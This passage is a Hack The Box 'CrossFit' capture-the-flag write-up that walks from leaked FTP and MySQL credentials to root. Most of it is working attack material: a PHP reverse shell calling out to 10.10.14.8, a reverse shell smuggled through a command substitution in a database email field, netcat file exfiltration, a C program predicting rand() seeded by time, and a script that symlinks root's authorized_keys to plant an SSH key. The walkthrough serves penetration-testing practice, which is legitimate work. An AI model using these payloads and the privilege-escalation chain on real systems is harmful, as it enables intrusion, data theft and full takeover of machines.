account sufficient pam_mysql.so user=ftpadm passwd=8W)}gpRJvAmnb host=localhost db=ftphosting table=accounts usercolumn=username passwdcolumn=pass crypt=3

# Standard behaviour for ftpd(8).
auth    required        pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed

# Note: vsftpd handles anonymous logins on its own. Do not enable pam_ftp.so.

# Standard pam includes
@include common-account
@include common-session
@include common-auth
auth    required        pam_shells.so

And we find the ftp credentials

user=ftpadm passwd=8W)}gpRJvAmnb

Without wasting time let’s login in ftp with this credentials.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login ftpadm
密码: 
lftp ftpadm@10.10.10.208:~> ls
drwxrwx---    2 1003     116          4096 Sep 21 10:19 messages
lftp ftpadm@10.10.10.208:/> cd messages
lftp ftpadm@10.10.10.208:/messages> ls
lftp ftpadm@10.10.10.208:/messages>

There is a one directory called messsage but nothing inside it let’s put our rev.php inside it which we previously create.

rev.php

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# cat rev.php 
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'") ?>

lftp ftpadm@10.10.10.208:/messages> ls
lftp ftpadm@10.10.10.208:/messages> put rev.php
69 bytes transferred in 9 seconds (8 B/s)                        
lftp ftpadm@10.10.10.208:/messages> ls
-rw-r--r--    1 1003     1004           69 Nov 28 15:35 rev.php

Let’s login in mysql database.

hank@crossfit:~$ mysql -h localhost -ucrossfit -poeLoo~y2baeni
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2613
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| crossfit           |
| information_schema |
+--------------------+
2 rows in set (0.000 sec)

There is one database inside let go inside this and we see users table but nothing inside let’s put our rev shell inside.

Before insert inside users table start your netcat listner on 9001.

MariaDB [crossfit]> insert into users (id, email) values (9001, "-E $(bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1')");
Query OK, 1 row affected (0.001 sec)                                                                                                   
                                                                                                                                       
MariaDB [crossfit]> select * from users;                                                                                               
+------+----------------------------------------------------------+                                                                    
| id   | email                                                    |
+------+----------------------------------------------------------+
| 9001 | -E $(bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1') |
+------+----------------------------------------------------------+
1 row in set (0.000 sec)

MariaDB [crossfit]>

After 10-15sec you get your reverse shell.

┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:43934.
bash: cannot set terminal process group (27903): Inappropriate ioctl for device
bash: no job control in this shell
isaac@crossfit:~$ id
id
uid=1000(isaac) gid=1000(isaac) groups=1000(isaac),50(staff),116(ftp),1005(admins)
isaac@crossfit:~$ whoami
whoami
isaac

Boom we got the shell for isaac.

Now let’s run the pspy to see the which proccess are running inside the box.

• pspy64

trasfer this pspy64 inside box and run:

hank@crossfit:~$ ./pspy64 -f

2020/11/28 11:31:01 FS:        CLOSE_NOWRITE | /usr/bin/dbmsg

There is service called dbmsgthat runs every minute.

But it’s a binary file so we can’t cat it we need to analize this file with ghidra so let’s transfer it to our local machine.

I use nc to transfer the file.

hank@crossfit:~$ nc 10.10.14.8 9002 < /usr/bin/dbmsg

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# nc -lvp 9002 > dbmsg
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:58104.

Now let’s analize this in ghidra.

• ghidra

main function

void main(void)

{
  __uid_t _Var1;
  time_t tVar2;
  
  _Var1 = geteuid();
  if (_Var1 != 0) {
    fwrite("This program must be run as root.\n",1,0x22,stderr);
                    /* WARNING: Subroutine does not return */
    exit(1);
  }
  tVar2 = time((time_t *)0x0);
  srand((uint)tVar2);
  process_data();
                    /* WARNING: Subroutine does not return */
  exit(0);
}

After analize the program i unserstand that

The dbmsg program runs every minute and generates a random number with a “seed” or “base” of the time of the remote machine. with which we can create a C program that runs at the same time as dbmsg. this will create the same random number, always the best is in C since we have to use system libraries like the GNU / Libc glibc random number generator since the binary also uses it.

Let’s create the little program or at other words exploit:

exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void)
{
    srand(time(0));
    printf("%d", rand());

    return 0;
}

Let’s compile the exploit.

──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# gcc exploit.c -o exploit
ls -al | grep exploit
-rwxr-xr-x  1 root root   16736 11月 28 11:44 exploit
-rw-r--r--  1 root root     147 11月 28 11:43 exploit.c

Now let’s create ssh key

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# ssh-keygen -t ed25519 -f id_rsa
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:JKM0G1B6lxUQmO715Pq2UBdJoOe9QJjfmeU7tYIwdl4 root@kali
The key's randomart image is:
+--[ED25519 256]--+
|  ...ooo+o.      |
|   oo  * . .     |
|  ..= O + o .    |
|   o.*.O.o *     |
|   .o. +S B E .  |
|    .  ooB + o . |
|      ..  + + .  |
|      ...    o   |
|       oo.       |
+----[SHA256]-----+
┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# la -la | grep id_
-rw-------  1 root root     399 11月 28 11:45 id_rsa
-rw-r--r--  1 root root      91 11月 28 11:45 id_rsa.pub

Now create one more file called root.sh that will automate our process.

Change the ssh key of yours.

root.sh

chmod +x exploit
mysql -h localhost -u crossfit -poeLoo~y2baeni -Dcrossfit -e'insert into messages (id, name, email, message) values (1, "ssh-ed25519", "root@kali", "AAAAC3NzaC1lZDI1NTE5AAAAIBpM8dQcTJXzXOsciQU22F4qpf1jv/SscvQAu+kz7np1");'
while true; do ln -s /root/.ssh/authorized_keys /var/local/$(echo -n $(./exploit)1 | md5sum | cut -d " " -f 1) 2>/dev/null; done

Now transfer the file inside /home/isaac/ .

isaac@crossfit:~$ wget http://10.10.14.8/exploit
wget http://10.10.14.8/exploit
--2020-11-28 11:57:19--  http://10.10.14.8/exploit
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16736 (16K) [application/octet-stream]
Saving to: ‘exploit’

     0K .......... ......                                     100% 51.9K=0.3s

2020-11-28 11:57:23 (51.9 KB/s) - ‘exploit’ saved [16736/16736]

isaac@crossfit:~$ wget http://10.10.14.8/root.sh
wget http://10.10.14.8/root.sh
--2020-11-28 11:58:11--  http://10.10.14.8/root.sh
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 369 [text/x-sh]
Saving to: ‘root.sh’

     0K                                                       100% 60.4M=0s

2020-11-28 11:58:12 (60.4 MB/s) - ‘root.sh’ saved [369/369]

isaac@crossfit:~$ ls -la
ls -la
total 68
drwxr-xr-x 7 isaac isaac   4096 Nov 28 11:58 .
drwxr-xr-x 4 root  root    4096 Sep 21 04:00 ..
lrwxrwxrwx 1 root  root       9 May 12  2020 .bash_history -> /dev/null
-rw-r--r-- 1 isaac isaac    220 Apr 27  2020 .bash_logout
-rw-r--r-- 1 isaac isaac   3526 Apr 27  2020 .bashrc
drwx------ 5 isaac isaac   4096 May  4  2020 .cache
drwxr-xr-x 4 isaac isaac   4096 May 11  2020 .config
-rw-r--r-- 1 isaac isaac  16736 Nov 28 11:44 exploit
drwx------ 3 isaac isaac   4096 Apr 28  2020 .gnupg
drwxr-xr-x 3 isaac isaac   4096 May  4  2020 .local
lrwxrwxrwx 1 isaac isaac      9 May  4  2020 .mysql_history -> /dev/null
-rw-r--r-- 1 isaac isaac    807 Apr 27  2020 .profile
lrwxrwxrwx 1 root  root       9 May 12  2020 .python_history -> /dev/null
-rw-r--r-- 1 isaac isaac    369 Nov 28 11:52 root.sh
-rw-r--r-- 1 isaac isaac     74 May  5  2020 .selected_editor
drwxr-x--- 4 isaac admins  4096 May  9  2020 send_updates
isaac@crossfit:~$ chmod 777 *
chmod 777 *

Now run this command:

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.208
Linux crossfit 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 21 04:46:55 2020
root@crossfit:~# id
uid=0(root) gid=0(root) groups=0(root)
root@crossfit:~# whoami
root
root@crossfit:~# ls
cleanup.sh  delete_ftp_users.sh  root.txt
root@crossfit:~# cat root.txt
961252b5bd669e97c7ab25e93fc1a3a3

now we got root, and read the root.txt

• 

Summary of knowledge

• use xss + structured js file to read web pages
• structured js file to excecute php page
• use john crack hashs
• php escapeArgs option is not working properly
• crontab + mysql to get a reverse shell
• use pspy to get service runs progresses
• nc transfer files
• ghidra anlaliys file
• ed25519 ssh key + random number generator + bash script to privesc

Contact me

• QQ: 1185151867
• twitter: https://twitter.com/fdlucifer11
• github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…